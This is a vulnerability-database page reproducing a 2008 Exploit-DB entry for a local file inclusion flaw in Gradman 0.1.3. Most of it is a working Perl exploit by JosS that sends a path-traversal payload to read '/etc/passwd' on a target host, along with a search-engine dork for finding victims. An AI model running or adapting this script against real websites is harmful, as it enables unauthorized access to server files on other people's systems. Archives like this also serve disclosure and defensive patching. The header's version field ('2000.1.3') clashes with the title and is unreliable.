Gradman - exploit.company

vendor:

Gradman

by:

JosS

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Gradman

Affected Version From: 2000.1.3

Affected Version To: 2000.1.3

Patch Exists: YES

Related CWE: N/A

CPE: a:gradman:gradman

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Gradman <= 0.1.3 (agregar_info.php?tabla=) Local File Inclusion Exploit

Gradman is vulnerable to a local file inclusion vulnerability. This vulnerability is caused due to the improper validation of user-supplied input in the 'tabla' parameter of the 'agregar_info.php' script. An attacker can exploit this vulnerability to include arbitrary local files from the web server and execute arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.

Source

Exploit-DB raw data:

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+     Gradman <= 0.1.3  (agregar_info.php?tabla=) Local File Inclusion Exploit       +==--
--==+====================================================================================+==--
                     [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: Gradman <= 0.1.3
[~] HomePage: http://gradman.xe1ido.com.mx/
[~] Exploit: Local File Inclusion [High]
[~] Where: agregar_info.php?tabla=
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Dork: "powered by Gradman"
[~] Dork2: Priv8, xD!


[+] Exploit:

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

print "\t\t########################################################\n\n";
print "\t\t#    Gradman <= 0.1.3 - Local File Inclusion Exploit   #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";


if (!$ARGV[0])
{
print "Usage: perl xpl.pl [HOST]\n";
print "Example: perl xpl.pl http://localhost/gradman/\n";
}

else
{

$web=$ARGV[0];
chomp $web;

$iny="agregar_info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00";

my $web1=$web.$iny;
print "$web1\n\n";
my $ua = LWP::UserAgent->new;
my $req=HTTP::Request->new(GET=>$web1);
$doc = $ua->request($req)->as_string;

if ($doc=~ /^root/moxis ){
print "Web is vuln\n";
}
else
{
print "Web is not vuln\n";
}

}


--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--==+====================================================================================+==--
                                       [+] [The End]

# milw0rm.com [2008-01-16]